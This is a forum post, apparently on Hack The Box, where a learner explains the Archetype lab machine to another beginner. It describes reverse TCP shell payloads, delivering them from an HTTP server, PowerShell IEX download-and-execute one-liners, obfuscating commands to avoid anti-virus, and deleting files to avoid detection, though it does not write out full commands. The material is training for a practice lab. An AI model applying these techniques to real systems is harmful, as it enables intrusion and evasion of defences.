ARCHETYPE

HTB Content Machines
2

Hey. :smile: Same situation here—total beginner. I had never seen the PowerShell command before, and had no idea what it meant.

Starting Point is a pretty rough spot for learning I think, because the walkthroughs don’t teach the meaning or method behind what you’re doing.

What I’ve started doing instead is read write-ups and watch videos for retired machines, and try to solve those. People use the same tools, and that helps learn the most common syntax. Also, people solve each box with different tools, and that helps to understand the theory behind the solutions. Don’t worry about “spoiling” the boxes. By the time you go back and try it on your own, you’ll have forgotten stuff and need to use trial and error or looks stuff up again. But you might have more fun as you learn this way.

Some things I learned about Archetype this way:

  1. The walkthrough has you create a file with code “$client = New-Object…”. This is a “reverse TCP shell payload” for Windows x64. Reading write-ups you’ll see that some people don’t code the payload themselves—they use a tool to generate it. You’ll also see some people generate a reverse HTTP or reverse HTTPS payload instead. You’ll see that payloads have a file format (e.g. PowerShell) and need to match the target OS (e.g. Windows) and architecture (e.g. 64-bit) or they might not execute once you get them onto the machine.

  2. The walkthrough has you set up a HTTP server to provide the payload to the machine. This is a “delivery method”. The goal is to get the payload onto the machine in any way that works, and a web delivery method is one common way of doing it. Other people might try to upload the file directly to the box using an available service and execute it somehow. A fun exercise might be to try getting the file onto Archetype somehow, and note why this does or doesn’t work.

  3. The PowerShell IEX command is an example of what’s sometimes called a “one-liner”. This is one way of using web delivery to download a payload to a machine and execute it in one go. Reading write-ups, you’ll see several people using this same syntax, so it’s a common one. Other people use a tool that generates the payload and then provides the command on-screen, so they can copy and paste it rather than just know it by heart. Some tools provide them with a PowerShell command that does the same thing but looks completely different to avoid anti-virus. Other people might try to just download the payload from your HTTP server onto the machine using a different command, and then execute it somehow. That would do the same thing, but it would leave a file on the hard drive that needs to be deleted afterwards to avoid detection.

In write-ups for linux boxes, you’ll see people generate a reverse shell payload file, use web delivery and a one-liner to download and execute it. The file will be different, and the one-liner has a different syntax, but they’re really doing the same thing as in Archetype. :smile: